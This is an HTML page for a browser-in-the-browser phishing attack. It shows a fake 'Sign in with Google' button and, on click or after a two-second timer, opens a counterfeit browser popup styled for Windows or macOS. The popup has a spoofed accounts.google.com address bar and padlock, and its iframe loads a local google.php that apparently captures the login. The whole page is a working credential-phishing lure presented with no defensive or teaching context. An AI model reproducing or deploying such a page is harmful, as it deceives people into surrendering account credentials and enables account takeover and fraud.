<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="./win/style.css">
    <link rel="stylesheet" href="./macos/style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
        function show() {
            if(navigator.userAgent.includes("Mac")){
                document.getElementById("window").removeAttribute("style");
            }else{
                document.getElementById("window-win").removeAttribute("style");
            }

        }
         setTimeout(function(){
                    show()
                    }, 2000);

    </script>
    <style>
        #window-win {
            background-color: white;
            overflow: hidden;
            position: absolute;
            z-index: 3;
            width: 25%;
            height: 70%;
        }
        #window {
            background-color: white;
            overflow: hidden;
            position: absolute;
            z-index: 3;
            width: 25%;
            height: 70%;
        }
        .body {
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            --antd-wave-shadow-color: #5D3EBC;
            --scroll-bar: 0;
            --blue: #007bff;
            --indigo: #6610f2;
            --purple: #6f42c1;
            --pink: #e83e8c;
            --red: #dc3545;
            --orange: #fd7e14;
            --yellow: #ffc107;
            --green: #28a745;
            --teal: #20c997;
            --cyan: #17a2b8;
            --white: #fff;
            --gray: #6c757d;
            --gray-dark: #343a40;
            --primary: #007bff;
            --secondary: #6c757d;
            --success: #28a745;
            --info: #17a2b8;
            --warning: #ffc107;
            --danger: #dc3545;
            --light: #f8f9fa;
            --dark: #343a40;
            --breakpoint-xs: 0;
            --breakpoint-sm: 576px;
            --breakpoint-md: 768px;
            --breakpoint-lg: 992px;
            --breakpoint-xl: 1200px;
            --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            box-sizing: border-box;
            font-weight: 400;
            text-align: left;
            width: 100%;
            height: 100%;
            margin: 0;
            color: #58666E;
            font-size: 12px;
            font-variant: tabular-nums;
            line-height: 1.5715;
            background-color: #fff;
            font-feature-settings: 'tnum', "tnum";
            font-family: 'Source Sans Pro', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
        }
        .background {
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            --antd-wave-shadow-color: #5D3EBC;
            --scroll-bar: 0;
            --blue: #007bff;
            --indigo: #6610f2;
            --purple: #6f42c1;
            --pink: #e83e8c;
            --red: #dc3545;
            --orange: #fd7e14;
            --yellow: #ffc107;
            --green: #28a745;
            --teal: #20c997;
            --cyan: #17a2b8;
            --white: #fff;
            --gray: #6c757d;
            --gray-dark: #343a40;
            --primary: #007bff;
            --secondary: #6c757d;
            --success: #28a745;
            --info: #17a2b8;
            --warning: #ffc107;
            --danger: #dc3545;
            --light: #f8f9fa;
            --dark: #343a40;
            --breakpoint-xs: 0;
            --breakpoint-sm: 576px;
            --breakpoint-md: 768px;
            --breakpoint-lg: 992px;
            --breakpoint-xl: 1200px;
            --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            font-weight: 400;
            font-size: 12px;
            font-variant: tabular-nums;
            line-height: 1.5715;
            font-feature-settings: 'tnum', "tnum";
            font-family: 'Source Sans Pro', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
            color: #58666E;
            -webkit-font-smoothing: antialiased;
            box-sizing: border-box;
            width: 100%;
            height: 100%;
            display: flex;
            position: absolute;
            text-align: center;
            align-items: center;
            justify-content: center;
            background-image: url('1e31e4e79c1bc94fa509.svg');
            overflow: hidden;
        }
        .loginCard {
            z-index: 0;
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            --antd-wave-shadow-color: #5D3EBC;
            --scroll-bar: 0;
            --blue: #007bff;
            --indigo: #6610f2;
            --purple: #6f42c1;
            --pink: #e83e8c;
            --red: #dc3545;
            --orange: #fd7e14;
            --yellow: #ffc107;
            --green: #28a745;
            --teal: #20c997;
            --cyan: #17a2b8;
            --white: #fff;
            --gray: #6c757d;
            --gray-dark: #343a40;
            --primary: #007bff;
            --secondary: #6c757d;
            --success: #28a745;
            --info: #17a2b8;
            --warning: #ffc107;
            --danger: #dc3545;
            --light: #f8f9fa;
            --dark: #343a40;
            --breakpoint-xs: 0;
            --breakpoint-sm: 576px;
            --breakpoint-md: 768px;
            --breakpoint-lg: 992px;
            --breakpoint-xl: 1200px;
            --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            font-weight: 400;
            font-family: 'Source Sans Pro', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
            -webkit-font-smoothing: antialiased;
            text-align: center;
            box-sizing: border-box;
            margin: 0;
            color: #58666E;
            font-size: 12px;
            font-variant: tabular-nums;
            line-height: 1.5715;
            list-style: none;
            font-feature-settings: 'tnum', "tnum";
            position: relative;
            background: #fff;
            border: 1px solid #f0f0f0;
            width: 490px;
            height: 277px;
            padding: 20px;
            box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
            border-radius: 8px;
            display: flex;
        }
        .sub-loginCard {
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            --antd-wave-shadow-color: #5D3EBC;
            --scroll-bar: 0;
            --blue: #007bff;
            --indigo: #6610f2;
            --purple: #6f42c1;
            --pink: #e83e8c;
            --red: #dc3545;
            --orange: #fd7e14;
            --yellow: #ffc107;
            --green: #28a745;
            --teal: #20c997;
            --cyan: #17a2b8;
            --white: #fff;
            --gray: #6c757d;
            --gray-dark: #343a40;
            --primary: #007bff;
            --secondary: #6c757d;
            --success: #28a745;
            --info: #17a2b8;
            --warning: #ffc107;
            --danger: #dc3545;
            --light: #f8f9fa;
            --dark: #343a40;
            --breakpoint-xs: 0;
            --breakpoint-sm: 576px;
            --breakpoint-md: 768px;
            --breakpoint-lg: 992px;
            --breakpoint-xl: 1200px;
            --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            font-weight: 400;
            font-family: 'Source Sans Pro', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
            -webkit-font-smoothing: antialiased;
            text-align: center;
            color: #58666E;
            font-size: 12px;
            font-variant: tabular-nums;
            line-height: 1.5715;
            list-style: none;
            font-feature-settings: 'tnum', "tnum";
            box-sizing: border-box;
            padding: 24px;
        }
        .mb-5 {
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            --antd-wave-shadow-color: #5D3EBC;
            --scroll-bar: 0;
            --blue: #007bff;
            --indigo: #6610f2;
            --purple: #6f42c1;
            --pink: #e83e8c;
            --red: #dc3545;
            --orange: #fd7e14;
            --yellow: #ffc107;
            --green: #28a745;
            --teal: #20c997;
            --cyan: #17a2b8;
            --white: #fff;
            --gray: #6c757d;
            --gray-dark: #343a40;
            --primary: #007bff;
            --secondary: #6c757d;
            --success: #28a745;
            --info: #17a2b8;
            --warning: #ffc107;
            --danger: #dc3545;
            --light: #f8f9fa;
            --dark: #343a40;
            --breakpoint-xs: 0;
            --breakpoint-sm: 576px;
            --breakpoint-md: 768px;
            --breakpoint-lg: 992px;
            --breakpoint-xl: 1200px;
            --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
            font-weight: 400;
            font-family: 'Source Sans Pro', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;
            -webkit-font-smoothing: antialiased;
            text-align: center;
            color: #58666E;
            font-size: 12px;
            font-variant: tabular-nums;
            line-height: 1.5715;
            list-style: none;
            font-feature-settings: 'tnum', "tnum";
            box-sizing: border-box;
            margin-bottom: 3rem !important;
        }
        .sign-google-bar {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            font-weight: 400;
            -webkit-text-size-adjust: 100%;
            -webkit-user-select: none;
            color: #3c4043;
            cursor: pointer;
            font-family: "Google Sans",arial,sans-serif;
            font-size: 14px;
            letter-spacing: 0.25px;
            text-align: center;
            white-space: nowrap;
            transition: background-color .218s;
            bottom: 0;
            left: 0;
            position: absolute;
            right: 0;
            top: 0;
        }
        .sub-sign-google-bar {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            font-weight: 400;
            -webkit-text-size-adjust: 100%;
            -webkit-user-select: none;
            color: #3c4043;
            cursor: pointer;
            font-family: "Google Sans",arial,sans-serif;
            font-size: 14px;
            letter-spacing: 0.25px;
            text-align: center;
            white-space: nowrap;
            display: flex;
            align-items: center;
            flex-direction: row;
            justify-content: space-between;
            flex-wrap: nowrap;
            height: 100%;
            position: relative;
            width: 100%;
        }

        .sub-sign-google-icon {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            font-weight: 400;
            -webkit-text-size-adjust: 100%;
            -webkit-user-select: none;
            color: #3c4043;
            cursor: pointer;
            font-family: "Google Sans",arial,sans-serif;
            font-size: 14px;
            letter-spacing: 0.25px;
            text-align: center;
            white-space: nowrap;
            height: 18px;
            margin-right: 8px;
            min-width: 18px;
            width: 18px;
        }

        .sign-google-text {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            -webkit-text-size-adjust: 100%;
            -webkit-user-select: none;
            color: #3c4043;
            cursor: pointer;
            font-size: 14px;
            letter-spacing: 0.25px;
            text-align: center;
            white-space: nowrap;
            flex-grow: 1;
            font-family: "Google Sans",arial,sans-serif;
            font-weight: 500;
            overflow: hidden;
            text-overflow: ellipsis;
            vertical-align: top;
        }
        .svg {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            font-weight: 400;
            -webkit-text-size-adjust: 100%;
            -webkit-user-select: none;
            color: #3c4043;
            cursor: pointer;
            font-family: "Google Sans",arial,sans-serif;
            font-size: 14px;
            letter-spacing: 0.25px;
            text-align: center;
            white-space: nowrap;
            display: block;
        }
        .google-button {
            direction: ltr;
            -webkit-font-smoothing: antialiased;
            font-weight: 400;
            -webkit-text-size-adjust: 100%;
            border-radius: 4px;
            box-sizing: border-box;
            transition: background-color .218s,border-color .218s;
            -webkit-user-select: none;
            -webkit-appearance: none;
            background-color: #fff;
            background-image: none;
            border: 1px solid #dadce0;
            color: #3c4043;
            cursor: pointer;
            font-family: "Google Sans",arial,sans-serif;
            font-size: 14px;
            height: 40px;
            letter-spacing: 0.25px;
            outline: none;
            overflow: hidden;
            padding: 0 12px;
            position: relative;
            text-align: center;
            vertical-align: middle;
            white-space: nowrap;
            width: 400px;
            max-width: 400px;
            min-width: min-content;
        }
    </style>
</head>
<body class="body">
<div class="background">
    <div id="window-win" style="display: none">
        <!-- Title bar start -->
        <div id="title-bar-width-win">
            <div id="title-bar-win">
                <div style="margin-top:5px;">
                    <img src="./google_icon.webp" width="30px" height="30px" id="logo">
                    <span id="logo-description-win">Sign in - Google Accounts</span>
                </div>

                <div>
                    <span id="minimize-win">&#8212;</span>
                    <span id="square-win">□</span>
                    <span id="exit-win">✕</span>
                </div>
            </div>
            <div id="url-bar-win">
                <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock-win">
                <span id="domain-name-win">accounts.google.com</span>
                <span id="domain-path-win">/v3/signin/identifier?dsh=S-1392313435...</span>
            </div>
        </div>
        <!-- Content start -->

        <iframe id="content-win" src="./google.php" frameBorder="0"></iframe>

    </div>
    <div id="window" style="display: none">
        <!-- Title bar start -->
        <div id="title-bar-width">
            <div id="title-bar" class="outer yosemite">
		<span class="dots">
	     <div id="exit" class="dot red"></div>
	     <div id="minimize" class="dot amber"></div>
	     <div id="maximize" class="dot green"></div>
	    </span>

                <span id="logo-description">Sign in - Google Accounts</span>
            </div>
            <div id="url-bar">
                <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
                <span id="domain-name">accounts.google.com</span>
                <span id="domain-path">/v3/signin/identifier?dsh=S-1392313435...</span>
            </div>
        </div>
        <!-- Content start -->
        <iframe id="content" src="./google.php" frameBorder="0"></iframe>
    </div>
    <div class="loginCard">
        <div class="sub-loginCard">
            <div class="mb-5"><img src="./cfb452eba9a29e382c12.png" height="50" alt="logo"
                                   class="cursorAuto-0-2-15 mw-100 "></div>
            <div onclick="show()" tabindex="0" role="button" aria-labelledby="button-label" class="google-button" style="width:400px; max-width:400px; min-width:min-content;">
            <div class="sign-google-bar"></div>
                <div class="sub-sign-google-bar">
                    <div class="sub-sign-google-icon">
                        <svg version="1.1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 48 48" class="svg">
                            <g>
                                <path fill="#EA4335"
                                      d="M24 9.5c3.54 0 6.71 1.22 9.21 3.6l6.85-6.85C35.9 2.38 30.47 0 24 0 14.62 0 6.51 5.38 2.56 13.22l7.98 6.19C12.43 13.72 17.74 9.5 24 9.5z"></path>
                                <path fill="#4285F4"
                                      d="M46.98 24.55c0-1.57-.15-3.09-.38-4.55H24v9.02h12.94c-.58 2.96-2.26 5.48-4.78 7.18l7.73 6c4.51-4.18 7.09-10.36 7.09-17.65z"></path>
                                <path fill="#FBBC05"
                                      d="M10.53 28.59c-.48-1.45-.76-2.99-.76-4.59s.27-3.14.76-4.59l-7.98-6.19C.92 16.46 0 20.12 0 24c0 3.88.92 7.54 2.56 10.78l7.97-6.19z"></path>
                                <path fill="#34A853"
                                      d="M24 48c6.48 0 11.93-2.13 15.89-5.81l-7.73-6c-2.15 1.45-4.92 2.3-8.16 2.3-6.26 0-11.57-4.22-13.47-9.91l-7.98 6.19C6.51 42.62 14.62 48 24 48z"></path>
                                <path fill="none" d="M0 0h48v48H0z"></path>
                            </g>
                        </svg>
                    </div>
                        <span class="sign-google-text">Sign in with Google</span>
                </div>

            </div>

        </div>
    </div>

</div>

</body>
<script src="./win/script.js"></script>
<script src="./macos/script.js"></script>
</html>